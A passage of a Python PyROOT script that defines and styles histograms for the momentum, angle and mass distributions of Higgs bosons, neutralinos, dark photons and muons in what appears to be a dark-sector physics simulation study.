h_gammaD_2_cT_lab = ROOT.TH1F("h_gammaD_2_cT_lab", "h_gammaD_2_cT_lab", numBins, 0, cTlim)
h_gammaD_2_cT_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_lab.SetLineWidth(2)
h_gammaD_2_cT_lab.SetLineStyle(1)
h_gammaD_2_cT_XY_lab = ROOT.TH1F("h_gammaD_2_cT_XY_lab", "h_gammaD_2_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_2_cT_XY_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_XY_lab.SetLineWidth(2)
h_gammaD_2_cT_XY_lab.SetLineStyle(1)
h_gammaD_2_cT_Z_lab = ROOT.TH1F("h_gammaD_2_cT_Z_lab", "h_gammaD_2_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_2_cT_Z_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_Z_lab.SetLineWidth(2)
h_gammaD_2_cT_Z_lab.SetLineStyle(1)
h_muon_pT_dummy = ROOT.TH1F("h_muon_pT_dummy", "h_muon_pT_dummy", nBins, binMin, binMax)
h_muon_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pT_dummy.SetTitleOffset(1.35, "Y")
h_muon_pT_dummy.SetXTitle("p_{T} of #mu [GeV]")
h_muon_pT_dummy.SetMaximum( 0.2 )
h_higgs_pT_dummy = ROOT.TH1F("h_higgs_pT_dummy", "h_higgs_pT_dummy", 10, 0, 10)
h_higgs_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pT_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pT_dummy.SetXTitle("p_{T} of h [GeV]")
h_higgs_pT_dummy.SetMaximum( 1.1 )
h_muon_pZ_dummy = ROOT.TH1F("h_muon_pZ_dummy", "h_muon_pZ_dummy", nBins, binMin, binMax)
h_muon_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pZ_dummy.SetTitleOffset(1.35, "Y")
h_muon_pZ_dummy.SetXTitle("|p_{Z}| of #mu [GeV]")
h_muon_pZ_dummy.SetMaximum( yMax )
h_higgs_pZ_dummy = ROOT.TH1F("h_higgs_pZ_dummy", "h_higgs_pZ_dummy", 50, 0, 500)
h_higgs_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pZ_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pZ_dummy.SetXTitle("|p_{Z}| of h [GeV]")
h_higgs_pZ_dummy.SetMaximum( 0.1 )
h_muon_Eta_dummy = ROOT.TH1F("h_muon_Eta_dummy", "h_muon_Eta_dummy", 100, -5, 5)
h_muon_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_Eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_Eta_dummy.SetXTitle("#eta of #mu")
h_muon_Eta_dummy.SetMaximum( 0.1 )
#h_higgs_Eta_dummy = ROOT.TH1F("h_higgs_Eta_dummy", "h_higgs_Eta_dummy", 100,-5,5)
#h_higgs_Eta_dummy.SetYTitle("Fraction of events / 0.1 GeV")
#h_higgs_Eta_dummy.SetTitleOffset(1.35, "Y")
#h_higgs_Eta_dummy.SetXTitle("#eta of h [GeV]")
#h_higgs_Eta_dummy.SetMaximum( 0.1 )
h_muon_Phi_dummy = ROOT.TH1F("h_muon_Phi_dummy", "h_muon_Phi_dummy", 80,-4,4)
h_muon_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_Phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_Phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_Phi_dummy.SetMaximum( 0.1 )
h_higgs_Phi_dummy = ROOT.TH1F("h_higgs_Phi_dummy", "h_higgs_Phi_dummy", 80,-4,4)
h_higgs_Phi_dummy.SetYTitle("Fraction of events")
h_higgs_Phi_dummy.SetTitleOffset(1.35, "Y")
h_higgs_Phi_dummy.SetXTitle("#phi of h [rad]")
h_higgs_Phi_dummy.SetMaximum( 1.4 )
h_higgs_p_dummy = ROOT.TH1F("h_higgs_p_dummy", "h_higgs_p_dummy", 50, 0, 500)
h_higgs_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_p_dummy.SetTitleOffset(1.35, "Y")
h_higgs_p_dummy.SetXTitle("p of h [GeV]")
h_higgs_p_dummy.SetMaximum( 0.1 )
h_higgs_M_dummy = ROOT.TH1F("h_higgs_M_dummy", "h_higgs_M_dummy", 220, 80.5, 300.5)
h_higgs_M_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_M_dummy.SetTitleOffset(1.35, "Y")
h_higgs_M_dummy.SetXTitle("Mass of h [GeV]")
h_higgs_M_dummy.SetLabelSize(0.03,"X")
h_higgs_M_dummy.SetMaximum( 1.5 )
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_p = ROOT.TH1F("h_higgs_p", "h_higgs_p", 50, 0, 500)
h_higgs_p.SetLineColor(ROOT.kBlue)
h_higgs_p.SetLineWidth(2)
h_higgs_p.SetLineStyle(1)
h_higgs_M = ROOT.TH1F("h_higgs_M", "h_higgs_M", 10, 120.5, 130.5)
h_higgs_M.SetLineColor(ROOT.kBlue)
h_higgs_M.SetLineWidth(2)
h_higgs_M.SetLineStyle(1)
h_higgs_pT = ROOT.TH1F("h_higgs_pT", "h_higgs_pT", 10, 0, 10)
h_higgs_pT.SetLineColor(ROOT.kBlue)
h_higgs_pT.SetLineWidth(2)
h_higgs_pT.SetLineStyle(1)
h_n1_1_pT_dummy = ROOT.TH1F("h_n1_1_pT_dummy", "h_n1_1_pT_dummy", 70, 0, 70)
h_n1_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pT_dummy.SetXTitle("p_{T} of n_{1} [GeV]")
h_n1_1_pT_dummy.SetMaximum( yMax )
h_higgs_pZ = ROOT.TH1F("h_higgs_pZ", "h_higgs_pZ", 50, 0, 500)
h_higgs_pZ.SetLineColor(ROOT.kBlue)
h_higgs_pZ.SetLineWidth(2)
h_higgs_pZ.SetLineStyle(1)
h_n1_1_pZ_dummy = ROOT.TH1F("h_n1_1_pZ_dummy", "h_n1_1_pZ_dummy", 300, 0, 300)
h_n1_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{1} [GeV]")
h_n1_1_pZ_dummy.SetMaximum( 0.1 )
#h_higgs_Eta = ROOT.TH1F("h_higgs_Eta", "h_higgs_Eta", 50,0,5)
#h_higgs_Eta.SetLineColor(ROOT.kBlue)
#h_higgs_Eta.SetLineWidth(2)
#h_higgs_Eta.SetLineStyle(1)
h_n1_1_Eta_dummy = ROOT.TH1F("h_n1_1_Eta_dummy", "h_n1_1_Eta_dummy", 100,-5,5)
h_n1_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_n1_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Eta_dummy.SetXTitle("#eta of n_{1}")
h_n1_1_Eta_dummy.SetMaximum( 0.1 )
h_higgs_Phi = ROOT.TH1F("h_higgs_Phi", "h_higgs_Phi", 80,-4,4)
h_higgs_Phi.SetLineColor(ROOT.kBlue)
h_higgs_Phi.SetLineWidth(2)
h_higgs_Phi.SetLineStyle(1)
h_n1_1_Phi_dummy = ROOT.TH1F("h_n1_1_Phi_dummy", "h_n1_1_Phi_dummy", 80,-4,4)
h_n1_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_n1_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Phi_dummy.SetXTitle("#phi of n_{1} [rad]")
h_n1_1_Phi_dummy.SetMaximum( 0.05 )
h_n1_1_p_dummy = ROOT.TH1F("h_n1_1_p_dummy", "h_n1_1_p_dummy", 300, 0, 300)
h_n1_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_p_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_p_dummy.SetXTitle("p of n_{1} [GeV]")
h_n1_1_p_dummy.SetMaximum( 0.1 )
h_n1_1_M_dummy = ROOT.TH1F("h_n1_1_M_dummy", "h_n1_1_M_dummy", 200, 0.05, 20.05)
h_n1_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_n1_1_M_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_M_dummy.SetXTitle("Mass of n_{1} [GeV]")
h_n1_1_M_dummy.SetMaximum( 1.6 )
h_n1_1_p = ROOT.TH1F("h_n1_1_p", "h_n1_1_p", 300, 0, 300)
h_n1_1_p.SetLineColor(ROOT.kBlue)
h_n1_1_p.SetLineWidth(2)
h_n1_1_p.SetLineStyle(1)
h_n1_1_M = ROOT.TH1F("h_n1_1_M", "h_n1_1_M", 200, 0.05, 20.05)
h_n1_1_M.SetLineColor(ROOT.kBlue)
h_n1_1_M.SetLineWidth(2)
h_n1_1_M.SetLineStyle(1)
h_n1_1_pT = ROOT.TH1F("h_n1_1_pT", "h_n1_1_pT", 70, 0, 70) #this is the peak at 60
h_n1_1_pT.SetLineColor(ROOT.kBlue)
h_n1_1_pT.SetLineWidth(2)
h_n1_1_pT.SetLineStyle(1)
h_n1_1_pZ = ROOT.TH1F("h_n1_1_pZ", "h_n1_1_pZ", 300, 0, 300)
h_n1_1_pZ.SetLineColor(ROOT.kBlue)
h_n1_1_pZ.SetLineWidth(2)
h_n1_1_pZ.SetLineStyle(1)
h_n1_1_Eta = ROOT.TH1F("h_n1_1_Eta", "h_n1_1_Eta", 100,-5,5)
h_n1_1_Eta.SetLineColor(ROOT.kBlue)
h_n1_1_Eta.SetLineWidth(2)
h_n1_1_Eta.SetLineStyle(1)
h_n1_1_Phi = ROOT.TH1F("h_n1_1_Phi", "h_n1_1_Phi", 80,-4,4)
h_n1_1_Phi.SetLineColor(ROOT.kBlue)
h_n1_1_Phi.SetLineWidth(2)
h_n1_1_Phi.SetLineStyle(1)
#h_n1_2_pT_dummy = ROOT.TH1F("h_n1_2_pT_dummy", "h_n1_2_pT_dummy", 700, 0, 70) #this is the peak at ~10GeV
#h_n1_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_pT_dummy.SetXTitle("p_{T n_{1}} [GeV]")
#h_n1_2_pT_dummy.SetMaximum( yMax )
#
#h_n1_2_p_dummy = ROOT.TH1F("h_n1_2_p_dummy", "h_n1_2_p_dummy", 20, 50, 70)
#h_n1_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_p_dummy.SetXTitle("p_{n_{1}} [GeV]")
#h_n1_2_p_dummy.SetMaximum( 0.05 )
#
#h_n1_2_M_dummy = ROOT.TH1F("h_n1_2_M_dummy", "h_n1_2_M_dummy", 200, 0, 20)
#h_n1_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_M_dummy.SetXTitle("m_{n_{1}} [GeV]")
#h_n1_2_M_dummy.SetMaximum( 1.2 )
h_n1_2_p = ROOT.TH1F("h_n1_2_p", "h_n1_2_p", 300, 0, 300)
h_n1_2_p.SetLineColor(ROOT.kRed)
h_n1_2_p.SetLineWidth(2)
h_n1_2_p.SetLineStyle(1)
#h_n1_2_M = ROOT.TH1F("h_n1_2_M", "h_n1_2_M", 200, 0.05, 20.05)
#h_n1_2_M.SetLineColor(ROOT.kRed)
#h_n1_2_M.SetLineWidth(2)
#h_n1_2_M.SetLineStyle(1)
h_n1_2_pT = ROOT.TH1F("h_n1_2_pT", "h_n1_2_pT", 70, 0, 70)
h_n1_2_pT.SetLineColor(ROOT.kRed)
h_n1_2_pT.SetLineWidth(2)
h_n1_2_pT.SetLineStyle(1)
h_nD_1_pT_dummy = ROOT.TH1F("h_nD_1_pT_dummy", "h_nD_1_pT_dummy", 130, 0, 130)
h_nD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pT_dummy.SetXTitle("p_{T} of n_{D} [GeV]")
h_nD_1_pT_dummy.SetMaximum( 0.1 )
h_n1_2_pZ = ROOT.TH1F("h_n1_2_pZ", "h_n1_2_pZ", 300, 0, 300)
h_n1_2_pZ.SetLineColor(ROOT.kRed)
h_n1_2_pZ.SetLineWidth(2)
h_n1_2_pZ.SetLineStyle(1)
h_nD_1_pZ_dummy = ROOT.TH1F("h_nD_1_pZ_dummy", "h_nD_1_pZ_dummy", 130, 0, 130)
h_nD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{D} [GeV]")
h_nD_1_pZ_dummy.SetMaximum( 0.1 )
h_n1_2_Eta = ROOT.TH1F("h_n1_2_Eta", "h_n1_2_Eta", 100,-5,5)
h_n1_2_Eta.SetLineColor(ROOT.kRed)
h_n1_2_Eta.SetLineWidth(2)
h_n1_2_Eta.SetLineStyle(1)
h_nD_1_Eta_dummy = ROOT.TH1F("h_nD_1_Eta_dummy", "h_nD_1_Eta_dummy", 100,-5,5)
h_nD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_nD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Eta_dummy.SetXTitle("#eta of n_{D}")
h_nD_1_Eta_dummy.SetMaximum( 0.1 )
h_n1_2_Phi = ROOT.TH1F("h_n1_2_Phi", "h_n1_2_Phi", 80,-4,4)
h_n1_2_Phi.SetLineColor(ROOT.kRed)
h_n1_2_Phi.SetLineWidth(2)
h_n1_2_Phi.SetLineStyle(1)
h_nD_1_Phi_dummy = ROOT.TH1F("h_nD_1_Phi_dummy", "h_nD_1_Phi_dummy", 80,-4,4)
h_nD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_nD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Phi_dummy.SetXTitle("#phi of n_{D} [rad]")
h_nD_1_Phi_dummy.SetMaximum( 0.05 )
h_nD_1_p_dummy = ROOT.TH1F("h_nD_1_p_dummy", "h_nD_1_p_dummy", 130, 0, 130)
h_nD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_p_dummy.SetXTitle("p of n_{D} [GeV]")
h_nD_1_p_dummy.SetMaximum( 0.1 )
h_nD_1_M_dummy = ROOT.TH1F("h_nD_1_M_dummy", "h_nD_1_M_dummy", 20, 0.05, 2.05)
h_nD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_nD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_M_dummy.SetXTitle("Mass of n_{D} [GeV]")
h_nD_1_M_dummy.SetMaximum( 1.6 )
h_nD_1_p = ROOT.TH1F("h_nD_1_p", "h_nD_1_p", 130, 0, 130)
h_nD_1_p.SetLineColor(ROOT.kBlue)
h_nD_1_p.SetLineWidth(2)
h_nD_1_p.SetLineStyle(1)
h_nD_1_M = ROOT.TH1F("h_nD_1_M", "h_nD_1_M", 20, 0.05, 2.05)
h_nD_1_M.SetLineColor(ROOT.kBlue)
h_nD_1_M.SetLineWidth(2)
h_nD_1_M.SetLineStyle(1)
h_nD_1_pT = ROOT.TH1F("h_nD_1_pT", "h_nD_1_pT", 130, 0, 130)
h_nD_1_pT.SetLineColor(ROOT.kBlue)
h_nD_1_pT.SetLineWidth(2)
h_nD_1_pT.SetLineStyle(1)
h_nD_1_pZ = ROOT.TH1F("h_nD_1_pZ", "h_nD_1_pZ", 130, 0, 130)
h_nD_1_pZ.SetLineColor(ROOT.kBlue)
h_nD_1_pZ.SetLineWidth(2)
h_nD_1_pZ.SetLineStyle(1)
h_nD_1_Eta = ROOT.TH1F("h_nD_1_Eta", "h_nD_1_Eta", 100,-5,5)
h_nD_1_Eta.SetLineColor(ROOT.kBlue)
h_nD_1_Eta.SetLineWidth(2)
h_nD_1_Eta.SetLineStyle(1)
h_nD_1_Phi = ROOT.TH1F("h_nD_1_Phi", "h_nD_1_Phi", 80,-4,4)
h_nD_1_Phi.SetLineColor(ROOT.kBlue)
h_nD_1_Phi.SetLineWidth(2)
h_nD_1_Phi.SetLineStyle(1)
#h_nD_2_pT_dummy = ROOT.TH1F("h_nD_2_pT_dummy", "h_nD_2_pT_dummy", 100, 0, 100)
#h_nD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_pT_dummy.SetXTitle("p_{T nD_2} [GeV]")
#h_nD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_nD_2_p_dummy = ROOT.TH1F("h_nD_2_p_dummy", "h_nD_2_p_dummy", 100, 0, 100)
#h_nD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_p_dummy.SetXTitle("p_{nD_2} [GeV]")
#h_nD_2_p_dummy.SetMaximum( 0.01 )
#
#h_nD_2_M_dummy = ROOT.TH1F("h_nD_2_M_dummy", "h_nD_2_M_dummy", 20, 0, 2)
#h_nD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_M_dummy.SetXTitle("m_{nD_2} [GeV]")
#h_nD_2_M_dummy.SetMaximum( 1.2 )
h_nD_2_p = ROOT.TH1F("h_nD_2_p", "h_nD_2_p", 130, 0, 130)
h_nD_2_p.SetLineColor(ROOT.kRed)
h_nD_2_p.SetLineWidth(2)
h_nD_2_p.SetLineStyle(1)
#h_nD_2_M = ROOT.TH1F("h_nD_2_M", "h_nD_2_M", 20, 0.05, 2.05)
#h_nD_2_M.SetLineColor(ROOT.kRed)
#h_nD_2_M.SetLineWidth(2)
#h_nD_2_M.SetLineStyle(1)
h_nD_2_pT = ROOT.TH1F("h_nD_2_pT", "h_nD_2_pT", 130, 0, 130)
h_nD_2_pT.SetLineColor(ROOT.kRed)
h_nD_2_pT.SetLineWidth(2)
h_nD_2_pT.SetLineStyle(1)
h_gammaD_1_pT_dummy = ROOT.TH1F("h_gammaD_1_pT_dummy", "h_gammaD_1_pT_dummy", 100, 0, 100)
h_gammaD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pT_dummy.SetXTitle("p_{T} of #gamma_{D} [GeV]")
h_gammaD_1_pT_dummy.SetMaximum( 0.1 )
h_nD_2_pZ = ROOT.TH1F("h_nD_2_pZ", "h_nD_2_pZ", 130, 0, 130)
h_nD_2_pZ.SetLineColor(ROOT.kRed)
h_nD_2_pZ.SetLineWidth(2)
h_nD_2_pZ.SetLineStyle(1)
h_gammaD_1_pZ_dummy = ROOT.TH1F("h_gammaD_1_pZ_dummy", "h_gammaD_1_pZ_dummy", 100, 0, 100)
h_gammaD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pZ_dummy.SetXTitle("|p_{Z}| of #gamma_{D} [GeV]")
h_gammaD_1_pZ_dummy.SetMaximum( 0.1 )
h_nD_2_Eta = ROOT.TH1F("h_nD_2_Eta", "h_nD_2_Eta", 100,-5,5)
h_nD_2_Eta.SetLineColor(ROOT.kRed)
h_nD_2_Eta.SetLineWidth(2)
h_nD_2_Eta.SetLineStyle(1)
h_gammaD_1_Eta_dummy = ROOT.TH1F("h_gammaD_1_Eta_dummy", "h_gammaD_1_Eta_dummy",100,-5,5)
h_gammaD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_gammaD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Eta_dummy.SetXTitle("#eta of #gamma_{D}")
h_gammaD_1_Eta_dummy.SetMaximum( 0.1 )
h_nD_2_Phi = ROOT.TH1F("h_nD_2_Phi", "h_nD_2_Phi", 80,-4,4)
h_nD_2_Phi.SetLineColor(ROOT.kRed)
h_nD_2_Phi.SetLineWidth(2)
h_nD_2_Phi.SetLineStyle(1)
h_gammaD_1_Phi_dummy = ROOT.TH1F("h_gammaD_1_Phi_dummy", "h_gammaD_1_Phi_dummy",80,-4,4 )
h_gammaD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_gammaD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Phi_dummy.SetXTitle("#phi of #gamma_{D} [rad]")
h_gammaD_1_Phi_dummy.SetMaximum( 0.05 )
h_gammaD_1_p_dummy = ROOT.TH1F("h_gammaD_1_p_dummy", "h_gammaD_1_p_dummy", 100, 0, 100)
h_gammaD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_p_dummy.SetXTitle("p of #gamma_{D} [GeV]")
h_gammaD_1_p_dummy.SetMaximum( 0.1 )
h_gammaD_1_M_dummy = ROOT.TH1F("h_gammaD_1_M_dummy", "h_gammaD_1_M_dummy", 101, 0.1, 10.1)
h_gammaD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_gammaD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_M_dummy.SetXTitle("Mass of #gamma_{D} [GeV]")
h_gammaD_1_M_dummy.SetMaximum( 1.4 )
h_gammaD_1_p = ROOT.TH1F("h_gammaD_1_p", "h_gammaD_1_p", 100, 0, 100)
h_gammaD_1_p.SetLineColor(ROOT.kBlue)
h_gammaD_1_p.SetLineWidth(2)
h_gammaD_1_p.SetLineStyle(1)
h_gammaD_1_M = ROOT.TH1F("h_gammaD_1_M", "h_gammaD_1_M", 101, 0.1, 10.1)
h_gammaD_1_M.SetLineColor(ROOT.kBlue)
h_gammaD_1_M.SetLineWidth(2)
h_gammaD_1_M.SetLineStyle(1)
h_gammaD_1_pT = ROOT.TH1F("h_gammaD_1_pT", "h_gammaD_1_pT", 100, 0, 100)
h_gammaD_1_pT.SetLineColor(ROOT.kBlue)
h_gammaD_1_pT.SetLineWidth(2)
h_gammaD_1_pT.SetLineStyle(1)
h_gammaD_1_pZ = ROOT.TH1F("h_gammaD_1_pZ", "h_gammaD_1_pZ", 100, 0, 100)
h_gammaD_1_pZ.SetLineColor(ROOT.kBlue)
h_gammaD_1_pZ.SetLineWidth(2)
h_gammaD_1_pZ.SetLineStyle(1)
h_gammaD_1_Eta = ROOT.TH1F("h_gammaD_1_Eta", "h_gammaD_1_Eta",100,-5,5)
h_gammaD_1_Eta.SetLineColor(ROOT.kBlue)
h_gammaD_1_Eta.SetLineWidth(2)
h_gammaD_1_Eta.SetLineStyle(1)
h_gammaD_1_Phi = ROOT.TH1F("h_gammaD_1_Phi", "h_gammaD_1_Phi", 80,-4,4)
h_gammaD_1_Phi.SetLineColor(ROOT.kBlue)
h_gammaD_1_Phi.SetLineWidth(2)
h_gammaD_1_Phi.SetLineStyle(1)
#h_gammaD_2_pT_dummy = ROOT.TH1F("h_gammaD_2_pT_dummy", "h_gammaD_2_pT_dummy", 100, 0, 100)
#h_gammaD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_pT_dummy.SetXTitle("p_{T gammaD_2} [GeV]")
#h_gammaD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_p_dummy = ROOT.TH1F("h_gammaD_2_p_dummy", "h_gammaD_2_p_dummy", 100, 0, 100)
#h_gammaD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_p_dummy.SetXTitle("p_{gammaD_2} [GeV]")
#h_gammaD_2_p_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_M_dummy = ROOT.TH1F("h_gammaD_2_M_dummy", "h_gammaD_2_M_dummy", 300, 0, 3)
#h_gammaD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_M_dummy.SetXTitle("m_{gammaD_2} [GeV]")
#h_gammaD_2_M_dummy.SetMaximum( 1.2 )
h_gammaD_2_p = ROOT.TH1F("h_gammaD_2_p", "h_gammaD_2_p", 100, 0, 100)
h_gammaD_2_p.SetLineColor(ROOT.kRed)
h_gammaD_2_p.SetLineWidth(2)
h_gammaD_2_p.SetLineStyle(1)
#h_gammaD_2_M = ROOT.TH1F("h_gammaD_2_M", "h_gammaD_2_M", 500, 0.005, 10.005)
#h_gammaD_2_M.SetLineColor(ROOT.kRed)
#h_gammaD_2_M.SetLineWidth(2)
#h_gammaD_2_M.SetLineStyle(1)
h_gammaD_2_pT = ROOT.TH1F("h_gammaD_2_pT", "h_gammaD_2_pT", 100, 0, 100)
h_gammaD_2_pT.SetLineColor(ROOT.kRed)
h_gammaD_2_pT.SetLineWidth(2)
h_gammaD_2_pT.SetLineStyle(1)
h_gammaD_2_pZ = ROOT.TH1F("h_gammaD_2_pZ", "h_gammaD_2_pZ", 100, 0, 100)
h_gammaD_2_pZ.SetLineColor(ROOT.kRed)
h_gammaD_2_pZ.SetLineWidth(2)
h_gammaD_2_pZ.SetLineStyle(1)
h_gammaD_2_Eta = ROOT.TH1F("h_gammaD_2_Eta", "h_gammaD_2_Eta", 100,-5,5)
h_gammaD_2_Eta.SetLineColor(ROOT.kRed)
h_gammaD_2_Eta.SetLineWidth(2)
h_gammaD_2_Eta.SetLineStyle(1)
h_gammaD_2_Phi = ROOT.TH1F("h_gammaD_2_Phi", "h_gammaD_2_Phi", 80,-4,4)
h_gammaD_2_Phi.SetLineColor(ROOT.kRed)
h_gammaD_2_Phi.SetLineWidth(2)
h_gammaD_2_Phi.SetLineStyle(1)
h_muon_pT_0 = ROOT.TH1F("h_muon_pT_0", "h_muon_pT_0", nBins, binMin, binMax)
h_muon_pT_0.SetLineColor(ROOT.kBlue)
h_muon_pT_0.SetLineWidth(2)
h_muon_pT_0.SetLineStyle(1)
h_muon_pT_1 = ROOT.TH1F("h_muon_pT_1", "h_muon_pT_1", nBins, binMin, binMax)
h_muon_pT_1.SetLineColor(ROOT.kGreen)
h_muon_pT_1.SetLineWidth(2)
h_muon_pT_1.SetLineStyle(2)
h_muon_pT_2 = ROOT.TH1F("h_muon_pT_2", "h_muon_pT_2", nBins, binMin, binMax)
h_muon_pT_2.SetLineColor(ROOT.kRed)
h_muon_pT_2.SetLineWidth(2)
h_muon_pT_2.SetLineStyle(3)
h_muon_pT_3 = ROOT.TH1F("h_muon_pT_3", "h_muon_pT_3", nBins, binMin, binMax)
h_muon_pT_3.SetLineColor(ROOT.kBlack)
h_muon_pT_3.SetLineWidth(2)
h_muon_pT_3.SetLineStyle(4)
h_muon_phi_dummy = ROOT.TH1F("h_muon_phi_dummy", "h_muon_phi_dummy", 80, -4, 4)
h_muon_phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_phi_dummy.SetMaximum( 0.1 )
h_muon_phi_0 = ROOT.TH1F("h_muon_phi_0", "h_muon_phi_0", 80, -4, 4)
h_muon_phi_0.SetLineColor(ROOT.kBlue)
h_muon_phi_0.SetLineWidth(2)
h_muon_phi_0.SetLineStyle(1)
h_muon_phi_1 = ROOT.TH1F("h_muon_phi_1", "h_muon_phi_1", 80, -4, 4)
h_muon_phi_1.SetLineColor(ROOT.kGreen)
h_muon_phi_1.SetLineWidth(2)
h_muon_phi_1.SetLineStyle(2)
h_muon_phi_2 = ROOT.TH1F("h_muon_phi_2", "h_muon_phi_2", 80, -4, 4)
h_muon_phi_2.SetLineColor(ROOT.kRed)
h_muon_phi_2.SetLineWidth(2)
h_muon_phi_2.SetLineStyle(3)
h_muon_phi_3 = ROOT.TH1F("h_muon_phi_3", "h_muon_phi_3", 80, -4, 4)
h_muon_phi_3.SetLineColor(ROOT.kBlack)
h_muon_phi_3.SetLineWidth(2)
h_muon_phi_3.SetLineStyle(4)
h_muon_p_dummy = ROOT.TH1F("h_muon_p_dummy", "h_muon_p_dummy", 125, 0, 125)
h_muon_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_p_dummy.SetTitleOffset(1.35, "Y")
h_muon_p_dummy.SetXTitle("p of #mu [GeV]")
h_muon_p_dummy.SetMaximum( 0.2 )
h_muon_p_0 = ROOT.TH1F("h_muon_p_0", "h_muon_p_0", 125, 0, 125)
h_muon_p_0.SetLineColor(ROOT.kBlue)
h_muon_p_0.SetLineWidth(2)
h_muon_p_0.SetLineStyle(1)
h_muon_p_1 = ROOT.TH1F("h_muon_p_1", "h_muon_p_1", 125, 0, 125)
h_muon_p_1.SetLineColor(ROOT.kGreen)
h_muon_p_1.SetLineWidth(2)
h_muon_p_1.SetLineStyle(2)
h_muon_p_2 = ROOT.TH1F("h_muon_p_2", "h_muon_p_2", 125, 0, 125)
h_muon_p_2.SetLineColor(ROOT.kRed)
h_muon_p_2.SetLineWidth(2)
h_muon_p_2.SetLineStyle(3)
h_muon_p_3 = ROOT.TH1F("h_muon_p_3", "h_muon_p_3", 125, 0, 125)
h_muon_p_3.SetLineColor(ROOT.kBlack)
h_muon_p_3.SetLineWidth(2)
h_muon_p_3.SetLineStyle(125)
